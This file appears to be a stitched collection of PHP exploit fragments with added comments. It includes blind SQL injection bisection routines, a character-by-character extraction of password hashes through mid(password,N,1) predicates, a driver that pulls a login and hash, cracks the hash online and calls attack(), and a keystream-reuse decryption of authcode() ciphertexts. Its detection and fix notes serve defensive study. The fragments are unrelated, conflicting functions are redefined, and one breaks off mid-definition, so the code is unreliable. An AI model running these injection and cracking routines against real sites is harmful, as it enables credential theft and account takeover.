/**
 * Bisects the interval [$fmin, $fmax] until fewer than five candidates remain,
 * then hands the remaining window to crack().
 *
 * Every step asks check() whether the probed value is greater than the
 * midpoint, using the predicate string ">N". check(), crack() and credits()
 * are defined outside this snippet, so what check() actually sends is not
 * visible here.
 *
 * Detection note: this looks like the bisection step of a boolean-based blind
 * extraction (presumably against an injectable query; confirm against
 * check()). On the receiving side it would appear as a run of near-identical
 * requests that differ only in a comparison constant. Bound query parameters
 * on the target remove the yes/no oracle this relies on.
 *
 * @param mixed $sn   Passed through unchanged to check() and crack().
 * @param int   $fmin Lower bound of the current window.
 * @param int   $fmax Upper bound of the current window.
 * @return void
 */
function blind($sn, $fmin, $fmax)
{
    $width = $fmax - $fmin;

    if ($width >= 5) {
        // Window still wide: probe the midpoint and recurse into one half.
        $mid = intval($fmin + $width / 2);
        $predicate = ">" . $mid;

        if (check($predicate, $sn) == 1) {
            blind($sn, $mid, $fmax);
        } else {
            // The lower half keeps $mid + 1 as its upper bound.
            blind($sn, $fmin, $mid + 1);
        }
        return;
    }

    // Fewer than five candidates left: crack() takes over the final window.
    $outcome = crack($fmin, $fmax, $sn);
    if ($outcome == 0) {
        print "\n\rEXPLOIT FAILED...";
        credits();
    }
}
// Demonstration driver: two plaintexts are encrypted with authcode() under the
// same UC_KEY, and crack() is then given plaintext1 plus both ciphertexts.
// $plaintext1, $plaintext2 and UC_KEY are set outside this snippet.
// Prints one mt_rand() value; its role in the demonstration is not visible here.
echo mt_rand() . "\n";
echo "plaintext1 is : " . $plaintext1 . "\n";
echo "plaintext2 is : " . $plaintext2 . "\n";
// NOTE(review): 'ENCHODE' is not the default 'DECODE'; presumably authcode()
// treats any other operation string as "encode". Confirm against its body.
// substr(..., 0) returns the whole string, so it has no effect here.
$cliper1 = base64_decode(substr(authcode($plaintext1, 'ENCHODE', UC_KEY), 0));
echo "cliper1 is " . hex($cliper1) . "\n\n";
$cliper2 = base64_decode(substr(authcode($plaintext2, 'ENCHODE', UC_KEY), 0));
echo "cliper2 is " . hex($cliper2) . "\n\n";
/**
 * Renders each byte of $string as "\x" followed by its ord() value.
 *
 * NOTE(review): ord() yields a decimal integer and it is appended unpadded,
 * so despite the name the output is decimal, not hexadecimal.
 *
 * @param string $string Raw bytes to render.
 * @return string Concatenated "\xN" groups, one per input byte.
 */
function hex($string) {
    $result = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $result .= "\\x" . ord($string[$i]);
    }
    return $result;
}
echo "crack result is : " . crack($plaintext1, $cliper1, $cliper2);
/**
 * XORs a known plaintext with the tails of two ciphertexts, byte by byte.
 *
 * The result is $plain ^ $cipher_p[26..] ^ $cipher_t[26..]. That equals the
 * second message's plaintext only when both ciphertexts were produced with
 * the same keystream, which is the weakness this snippet illustrates. The fix
 * on the encrypting side is a fresh random nonce/IV per message together with
 * an authenticated cipher, so that no two messages share a keystream.
 *
 * Both tails are echoed through hex() as a side effect.
 *
 * @param string $plain    Known plaintext belonging to $cipher_p.
 * @param string $cipher_p Decoded ciphertext of $plain.
 * @param string $cipher_t Decoded ciphertext of the other message.
 * @return string XOR of the three inputs over strlen($plain) bytes.
 */
function crack($plain, $cipher_p, $cipher_t) {
    $target = '';
    $len = strlen($plain);
    // Skips the first 26 bytes of each ciphertext; presumably a header that
    // authcode() prepends. Confirm against authcode().
    $tmp_p = substr($cipher_p, 26);
    echo hex($tmp_p) . "\n";
    $tmp_t = substr($cipher_t, 26);
    echo hex($tmp_t) . "\n";
    // Assumes both tails hold at least strlen($plain) bytes; shorter input
    // would index past the end of the string.
    for ($i = 0; $i < $len; $i++) {
        $target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i]));
    }
    return $target;
}
// authcode() continues beyond this snippet.
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
/**
 * Resolves the character at position $i of a `password` column value by
 * passing yes/no SQL predicates to sqlject().
 *
 * A first probe asks whether the character is greater than '8' and selects an
 * index range of the global $hashtable (8..15 or 0..8). Each entry in that
 * range is then tested for equality. sqlject() and $hashtable are defined
 * outside this snippet; $hashtable presumably holds the sixteen hex digits
 * (confirm).
 *
 * If no entry matches, the function calls itself with the same argument and
 * discards the result, so that path never returns a value.
 *
 * Detection note: request parameters carrying `mid(password,N,1)` compared
 * against 0x.. literals are a recognisable pattern in web and database logs.
 * Bound parameters in the affected query remove the injection point.
 *
 * @param int $i Character position inserted into mid(password, $i, 1).
 * @return mixed The matching $hashtable entry when one is found.
 */
function crack($i)
{
    global $hashtable;

    // Halving probe: is the character above '8'?
    $aboveEight = sqlject("mid(password,{$i},1)>0x" . bin2hex('8'));
    if ($aboveEight) {
        $index = 8;
        $last = 15;
    } else {
        $index = 0;
        $last = 8;
    }

    // Linear equality scan over the selected range of $hashtable.
    while ($index <= $last) {
        $probe = "mid(password,{$i},1)=0x" . bin2hex($hashtable[$index]);
        if (sqlject($probe)) {
            return $hashtable[$index];
        }
        $index++;
    }

    // No match in range: retry the same position (result is not returned).
    crack($i);
}
print "[*] Login:\t"; $login = blind("email", $i); if ($login == "") { if ($i == 0) { print "\r[*] Attack failed.\n\n"; } else { print "\r[*] Attack failed (if you crack a hash, use -admin param).\n\n"; } break; } print "\n[*] Hash:\t"; $passwd = blind("mot_passe", $i); print "\n"; $md5 = strtolower($passwd); for ($a = 0; $a < sizeof($md5loc); $a++) { $r = crack($md5loc[$a][0], $md5loc[$a][1], $md5loc[$a][2]); if ($r) { print "[*] Password:\t{$r}\n"; break; } } if (!$r) { print "[*] Can't find the hash on the net, sorry.\n"; } else { attack($login, $r); die; } } } function blind($field, $i = 0) {
// Body of a function whose header lies outside this snippet: it reads a
// ciphertext from STDIN, asks $cipher->crack() for a key, and prints the
// result of $cipher->decrypt() with that key.
{
    global $cipher;
    echo 'Enter an encrypted message: ';
    // NOTE(review): fgets() keeps the trailing newline, and $ciphertext is
    // passed on untrimmed to crack() and decrypt().
    $ciphertext = fgets(STDIN);
    $key = $cipher->crack($ciphertext);
    echo "\n" . $cipher->decrypt($ciphertext, $key);
}
/*
|---------------------------------------------------------------------
| Main Loop
|---------------------------------------------------------------------
*/
// Interactive menu: repeats until option 3 sets $continue to false.
// $continue, encrypt() and crack() are defined outside this snippet.
while ($continue) {
    echo "Enter an option:\n1. Encrypt\n2. Crack\n3. Exit\n";
    // The line read still carries its newline; switch compares loosely, so
    // the string is matched against the integer case labels.
    // NOTE(review): at end of input fgets() returns false, which matches none
    // of the cases, reaches default and leaves $continue true, so the loop
    // does not stop on EOF.
    $selection = fgets(STDIN);
    switch ($selection) {
        case 1:
            encrypt();
            break;
        case 2:
            crack();
            break;
        case 3:
            $continue = false;
            echo 'Goodbye!';
            break;
        default:
            echo "I'm sorry, please select a valid option.\n";
            break;
    }
}
/**
 * Bisects the interval [$fmin, $fmax] and returns whatever crack() yields for
 * the final window of fewer than five candidates.
 *
 * At each step the predicate ">N" (N being the midpoint) is wrapped by
 * makeExpl() and evaluated by check(). makeExpl(), check() and crack() are
 * defined outside this snippet, so the request they build is not visible
 * here.
 *
 * Detection note: this looks like the bisection step of a boolean-based blind
 * extraction (presumably against an injectable query; confirm against
 * makeExpl()). On the receiving side it would appear as a burst of requests
 * that are identical apart from a converging comparison constant. Bound query
 * parameters on the target remove the oracle.
 *
 * @param mixed $param Passed through to makeExpl() and crack().
 * @param mixed $sn    Passed through to makeExpl() and crack().
 * @param int   $fmin  Lower bound of the current window.
 * @param int   $fmax  Upper bound of the current window.
 * @return mixed Result of crack() on the final window.
 */
function blind($param, $sn, $fmin, $fmax)
{
    if ($fmax - $fmin >= 5) {
        // Window still wide: probe the midpoint and descend into one half.
        $mid = intval($fmin + ($fmax - $fmin) / 2);
        $answer = check(makeExpl($param, ">" . $mid, $sn));

        // The lower half keeps $mid + 1 as its upper bound.
        return $answer == 1
            ? blind($param, $sn, $mid, $fmax)
            : blind($param, $sn, $fmin, $mid + 1);
    }

    // Fewer than five candidates left: crack() resolves the final window.
    return crack($param, $fmin, $fmax, $sn);
}